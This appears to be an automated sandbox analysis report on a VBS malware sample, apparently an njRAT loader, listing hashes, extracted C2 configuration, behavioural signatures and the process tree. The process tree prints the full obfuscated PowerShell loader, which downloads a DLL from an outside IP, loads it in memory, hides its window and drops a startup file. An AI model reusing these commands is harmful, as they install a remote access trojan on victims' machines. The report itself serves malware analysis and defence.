Analysis
-
max time kernel
147s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
01/09/2022, 19:13
Static task
static1
Behavioral task
behavioral1
Sample
7566214bddcf5c73e06b9e5c7504212b8632a9d97fb28446dc9a2cf2feaf42ab.vbs
Resource
win7-20220812-en
General
-
Target
7566214bddcf5c73e06b9e5c7504212b8632a9d97fb28446dc9a2cf2feaf42ab.vbs
-
Size
205KB
-
MD5
55f65c5be5331616022acfa14b13cf0d
-
SHA1
5715298639b8fa40e9621a9a1e5f4e12feb801ab
-
SHA256
7566214bddcf5c73e06b9e5c7504212b8632a9d97fb28446dc9a2cf2feaf42ab
-
SHA512
eaa7b7cea085d6703ad604cef958426b05da22930e451f65676b0f57631e0c7328ec089b8480debc41c2ecefddd8a7e173c4f9acce5baea72476fa983f934153
-
SSDEEP
96:W6Ww7isRFEDD7174KWOktsKFSG4qYk/uU95coQ18HE:l/FEDHxIBKoTjcX18k
Malware Config
Extracted
http://91.241.19.49/QWERTY/CRTZ/Dllf3.txt
Extracted
njrat
0.7NC
NYAN CAT
nyas22.duckdns.org:57831
8521e1f80fc24
-
reg_key
8521e1f80fc24
-
splitter
@!#&^%$
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 1 1592 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wed373kNHihfo908378&$!#$%&uhhjfn7wd.vbs powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wed373kNHihfo908378&$!#$%&uhhjfn7wd.vbs powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1592 set thread context of 3872 1592 powershell.exe 83 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 5092 powershell.exe 5092 powershell.exe 1592 powershell.exe 1592 powershell.exe -
Suspicious use of AdjustPrivilegeToken 37 IoCs
description pid Process Token: SeDebugPrivilege 5092 powershell.exe Token: SeDebugPrivilege 1592 powershell.exe Token: SeDebugPrivilege 3872 RegSvcs.exe Token: 33 3872 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3872 RegSvcs.exe Token: 33 3872 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3872 RegSvcs.exe Token: 33 3872 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3872 RegSvcs.exe Token: 33 3872 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3872 RegSvcs.exe Token: 33 3872 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3872 RegSvcs.exe Token: 33 3872 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3872 RegSvcs.exe Token: 33 3872 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3872 RegSvcs.exe Token: 33 3872 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3872 RegSvcs.exe Token: 33 3872 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3872 RegSvcs.exe Token: 33 3872 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3872 RegSvcs.exe Token: 33 3872 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3872 RegSvcs.exe Token: 33 3872 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3872 RegSvcs.exe Token: 33 3872 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3872 RegSvcs.exe Token: 33 3872 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3872 RegSvcs.exe Token: 33 3872 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3872 RegSvcs.exe Token: 33 3872 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3872 RegSvcs.exe Token: 33 3872 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3872 RegSvcs.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 4612 wrote to memory of 5092 4612 WScript.exe 80 PID 4612 wrote to memory of 5092 4612 WScript.exe 80 PID 5092 wrote to memory of 1592 5092 powershell.exe 82 PID 5092 wrote to memory of 1592 5092 powershell.exe 82 PID 1592 wrote to memory of 3872 1592 powershell.exe 83 PID 1592 wrote to memory of 3872 1592 powershell.exe 83 PID 1592 wrote to memory of 3872 1592 powershell.exe 83 PID 1592 wrote to memory of 3872 1592 powershell.exe 83 PID 1592 wrote to memory of 3872 1592 powershell.exe 83 PID 1592 wrote to memory of 3872 1592 powershell.exe 83 PID 1592 wrote to memory of 3872 1592 powershell.exe 83 PID 1592 wrote to memory of 3872 1592 powershell.exe 83
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7566214bddcf5c73e06b9e5c7504212b8632a9d97fb28446dc9a2cf2feaf42ab.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4612 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwAlAEsASQB0AE8ATwBQAF⌚⌚⌚AaQBTAE8AVQBsAFEARABqAHYAWABBAE8AZwAlACcAOwBbAEIAeQB0AG⌚⌚⌚AWwBdAF0AIAAkAEQATABMACAAPQAgAFsA⌚⌚⌚wB5AHMAdABlAG0ALgBDAG8AbgB2AG⌚⌚⌚AcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQA⌚⌚⌚wB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAG⌚⌚⌚AdAAuAFcAZQBiAEMAbABpAG⌚⌚⌚AbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQA⌚⌚⌚wB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgA0ADEALgAxADkALgA0ADkALwBRAFcARQBSAFQAWQAvAEMA⌚⌚⌚gB⌚⌚⌚AFoALwBEAGwAbABmADMALgB0AHgAdAAnACkAKQA7AFsA⌚⌚⌚wB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAH⌚⌚⌚AcgByAG⌚⌚⌚AbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQARABMAEwAKQAuAEcAZQB0AFQAeQBwAG⌚⌚⌚AKAAnAHgASwB2AEsAawB1AE4AWgAuAF⌚⌚⌚ARwBsAHkAbQB6AF⌚⌚⌚AZwAnACkALgBHAG⌚⌚⌚AdABNAG⌚⌚⌚AdABoAG8AZAAoACcAVQBEAHMA⌚⌚⌚wBpAEQAYgBiACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH⌚⌚⌚AbABsACwAIABbAG8AYgBqAG⌚⌚⌚AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AMgBYAFoALwB3AG⌚⌚⌚AbgAvAHQAcwBlAHQALwA5ADQALgA5ADEALgAxADQAMgAuADEAOQAvAC8AOgBwAHQAdABoACcAIAAsACAAJABSAG8AZABhAEMAbwBwAHkAIAAsACAAJwB3AG⌚⌚⌚AZAAzADcAMwBrAE4ASABpAGgAZgBvADkAMAA4ADMANwA4ACYAJAAhACIAIwAkAC⌚⌚⌚AJgB1AGgAaABqAGYAbgA3AHcAZAAnACAAKQApAA==';$OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('⌚⌚⌚','U') ) );$OWjuxD = $OWjuxD.replace('%KItOOPUiSOUlQDjvXAOg%', 'C:\Users\Admin\AppData\Local\Temp\7566214bddcf5c73e06b9e5c7504212b8632a9d97fb28446dc9a2cf2feaf42ab.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5092 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Users\Admin\AppData\Local\Temp\7566214bddcf5c73e06b9e5c7504212b8632a9d97fb28446dc9a2cf2feaf42ab.vbs';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/QWERTY/CRTZ/Dllf3.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('xKvKkuNZ.UGlymzUg').GetMethod('UDsSiDbb').Invoke($null, [object[]] ('txt.2XZ/wen/tset/94.91.142.19//:ptth' , $RodaCopy , 'wed373kNHihfo908378&$!"#$%&uhhjfn7wd' ))"3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1592 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3872
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0